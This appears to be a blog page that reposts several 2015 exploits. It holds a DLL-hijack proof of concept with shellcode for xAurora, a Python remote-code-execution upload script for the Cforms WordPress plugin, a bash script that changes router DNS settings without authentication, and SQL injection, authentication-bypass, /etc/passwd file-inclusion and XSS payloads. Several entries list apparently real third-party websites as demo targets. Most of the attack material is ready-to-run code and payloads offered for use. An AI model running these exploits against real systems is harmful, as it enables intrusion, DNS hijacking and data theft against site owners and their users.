February 24

xAurora vulnerability execute arbitrary code

xAurora is prone to a vulnerability that lets attackers execute arbitrary code.

An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.

*/

#include
#include
#include

char shellcode[]=”\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30″
“\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff”
“\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2″
“\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85″
“\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3″
“\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d”
“\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58″
“\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b”
“\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff”
“\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00″
“\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56″
“\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75″
“\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63″
“\x2e\x65\x78\x65\x00″;

int xAuroraPwnage()
{
int *ret;
ret=(int *)&ret+2;
(*ret)=(int)shellcode;
MessageBox(0, “[+] xAurora Pwned By Zer0 Thunder !”, “Not so Secured Browser”, MB_OK);
return 0;

}
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
xAuroraPwnage();
return 0;
}

Tags: ,

Related posts

February 24

Cforms 14.7 Unauthorised File upload

# Exploit Title: Remote Code Execution via Unauthorised File upload in Cforms 14.7
# Date: 2015-01-19
# Exploit Author: Zakhar
# Vendor Homepage: https://wordpress.org/plugins/cforms2/
# Software Link: https://downloads.wordpress.org/plugin/cforms2.zip
# Version: 14.7
# Tested on: WordPress 4.0
# CVE : 2014-9473

import os
import requests
import re
import base64
import sys
from lxml import etree
from optparse import OptionParser

def main():
print ‘Cforms II File Upload + Remote Code Execution\n’

text = ‘Test text’
text_mail = ‘test@mail.com’

parser = OptionParser()
parser.add_option(“-f”, “–file”, dest=”file”, help=”file to upload”, default = “itest.php”, metavar=”FILE”)
parser.add_option(“-i”, “–max-iterations”, dest=”iterations”, help=”Numbe of fields to iterate”, default = “10”)
parser.add_option(“-b”, “–upload-file-name-bruteforce”, dest=”brute”, help=”Uploaded file name brute force”, default = “10”)
parser.add_option(“-n”, “–cforms-form-number”, dest=”number”, help=”Cforms form number”, default = “”)
parser.add_option(“-c”, “–cforms-home-dir”, dest=”home”, help=”Cforms form home dir”, default = “/wp-content/plugins/cforms2/”)
parser.add_option(“-u”, “–url”, dest=”url”, help=”vulnerable url with contact form, example: http://127.0.0.1/Contact/”)

(opt, args) = parser.parse_args()
options = opt.__dict__
if not opt.url: # if url is not given
parser.error(‘URL not given’)
if not opt.file:
parser.error(‘file not given’)
filename = options[“file”]
if os.path.isfile(filename) is not True:
print ‘No such file ‘+filename
return 0

url = options[‘url’]
home = options[“home”]
i = options[“iterations”]
n = options[“number”]
b = options[“brute”]

s = requests.Session()

r = s.get(url)
if r.status_code != requests.codes.ok:
print ‘Error: website not found.’
return 0

tree = etree.HTML(r.text)
# get cforms id
if n is “”:
for x in xrange(2,10):
for node in tree.xpath(‘//*[@id=”cforms’+str(x)+’form”]’):
if node is not None:
n = str(x)
break
print ‘Cforms form number is <'+n+'>‘
hidden = [‘cf_working’+n,’cf_failure’+n,’cf_codeerr’+n,’cf_customerr’+n,’cf_popup’+n]
fields = [‘cf’+n+’_field_’+str(x) for x in xrange(1,int(i)+1)]
required = {‘sendbutton’+n:’1′}

for f in fields:
for node in tree.xpath(‘//*[@id=”‘ + f + ‘”]’):
if node is not None:
if ‘fldrequired’ in node.get(‘class’):
if ‘fldemail’ in node.get(‘class’):
required[f] = text_mail
else:
required[f] = text

for h in hidden:
for node in tree.xpath(‘//*[@id=”‘ + h + ‘”]’):
if node is not None:
required[h] = node.get(‘value’)

for node in tree.xpath(‘//*[@id=”cforms_captcha’+n+'”]’):
if node is not None:
print ‘Error: Cforms uses captcha. Sorry, you have to exploit it manually.’
return 0

files = {‘cf_uploadfile’+n+'[]':(‘wow.php’,open(filename))}
r = s.post(url,data=required,files=files)

if r.status_code != requests.codes.ok:
print ‘Error: post error.’
print r.status_code
return 0
else:
url1 = url + home + ‘noid-wow.php’
flag = 0
if s.get(url1).status_code != requests.codes.ok:
for l in xrange(1,int(b)):
url1 = url + home + str(l) + ‘-wow.php’
print url1
if s.get(url1).status_code == requests.codes.ok:
flag = 1
break
else:
flag = 1
if flag == 1:
print “Succes! Uploaded file: ” + url1
else:
print “Uploaded file not found. Try to increase -b flag or change upload dir. 14.6.3 version and above use wordpress upload folder”

main()

Tags:

Related posts

February 18

Vpersian CMS SQL Injection and Authentication bypass

####
#Exploit Title : Vpersian CMS SQL Injection and Authentication bypass
#Author : Abolfazl74
#Home page Link : http://vpersian.net
#Date : 03/02/2015
#Version: All versions
#Google dork: [intext:”VPersian CMS”]
#email : a.lovestory74@gmail.com
####

// Vulnerability Description:

SQL injection vulnerability:-
==============================
in file news_view.php data from GET parameter ‘recid’ is not getting filter before passing into SQL query and hence
rising SQL Injection vulnerability
——————-
POC
——————-

http://127.0.0.1/news_view.php?recid=SQL

Authentication Bypass:-
==============================
file index.php under directory admin has SQL injection vulnerability
parameter username and password suppliedin post parameter for checking valid admin username and password is not getting
filter before passing into SQL query which arise authentication bypass issue.
vulnerable code is
——————-
if(isset($_POST[login]))
{
$check=”select * from adminlogin where username=’$_POST[username]’ and password=’$_POST[username]'”;
$checkresult=mysql_query($check);
$checkcount=mysql_num_rows($checkresult);
if($checkcount>0)
{
$checkrow=mysql_fetch_array($checkresult);
$_SESSION[adminname]=$checkrow[adminname];
$_SESSION[adminloginstatus]=”success”;
echo “&ltscript>// “;
}
——————–
POC
——————–
Open admin page

http://127.0.0.1/admin/

username: ‘=’ ‘or’
password: ‘=’ ‘or’
#################################3
Example :

http://vpersian.net/news_view.php?recid=11%27

http://4tco.ir/news_view.php?recid=60%27

http://www.mtavoni.com/news_view.php?recid=3%27

Tags: ,

Related posts

February 18

Shuttle Tech ADSL Modem-Router 915 WM

#!/bin/bash
#
# Shuttle Tech ADSL Modem-Router 915 WM
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2015 (c) Todor Donev
# http://www.ethical-hacker.org/
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems’ DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Warning:
# My first public report on such a serious
# vulnerability was ignored by the manufacturers
# and were committed serious criminal deeds of
# cybercriminals in Brasil. This vulnerability
# could affect millions of users worldwide.
# http://www.exploit-db.com/exploits/16275/
# http://securelist.com/blog/research/57776/the-tale-of-one-thousand-and-one-dsl-modems/
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev’s
# responsibility.
#
# Use them at your own risk!
#
#

if [[ $# -gt 3 || $# -lt 2 ]]; then
echo ” Shuttle Tech ADSL Modem-Router 915 WM”
echo ” Unauthenticated Remote DNS Change Exploit”
echo ” ================================================================”
echo ” Usage: $0
echo ” Example: $0 133.7.133.7 8.8.8.8″
echo ” Example: $0 133.7.133.7 8.8.8.8 8.8.4.4″
echo “”
echo ” Copyright 2015 (c) Todor Donev
echo ” http://www.ethical-hacker.org/”
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo ” Error : libwww-perl not found =/”
exit;
fi
GET “http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1″ 0&> /dev/null <&1

Tags: ,

Related posts

February 18

Magento Server MAGMI Plugin Local File Inclusion And Cross Site Scripting

Exploit Title: Magento Server MAGMI Plugin Local File Inclusion And Cross Site Scripting
Software Link: http://sourceforge.net/projects/magmi/
Author: SECUPENT
Website:www.secupent.com
Email: research{at}secupent{dot}com
Date: 5-2-2015

Exploit(Local file inclusion) :

http://{Server}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility

Demo links:

http://itcontractor.co.za/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility

http://www.vmkdiamonds.com/old-site/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility

http://new.epicofficefurniture.com/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility

http://www.gooddrop.com.au/media/magmi/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility

Screenshot: http://secupent.com/exploit/images/magmilfi.jpg

Exploit(Cross Site Scripting):

1. http://{Server}/magmi/web/magmi.php?configstep=2&profile=%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E

2. http://{Server}/magmi/web/magmi_import_run.php?%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E

Demo Links:

http://www.gooddrop.com.au/media/magmi/magmi/web/magmi_import_run.php?%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E

http://new.epicofficefurniture.com/magmi/web/magmi_import_run.php?%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E

http://new.epicofficefurniture.com/magmi/web/magmi.php?configstep=2&profile=%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E

http://www.vmkdiamonds.com/old-site/magmi/web/magmi.php?configstep=2&profile=%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E

Screenshot 1:http://secupent.com/exploit/images/magmixss1.jpg
Screenshot 2: http://secupent.com/exploit/images/magmixss2.jpg

Tags:

Related posts